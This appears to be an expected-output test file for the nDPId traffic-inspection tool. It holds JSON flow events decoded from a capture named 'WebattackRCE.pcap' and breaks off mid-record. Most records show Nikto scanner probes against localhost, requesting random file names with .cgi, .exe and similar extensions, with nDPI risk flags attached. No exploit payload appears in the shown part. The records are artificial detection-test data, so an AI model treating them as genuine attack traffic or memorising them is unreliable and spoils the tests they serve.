-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 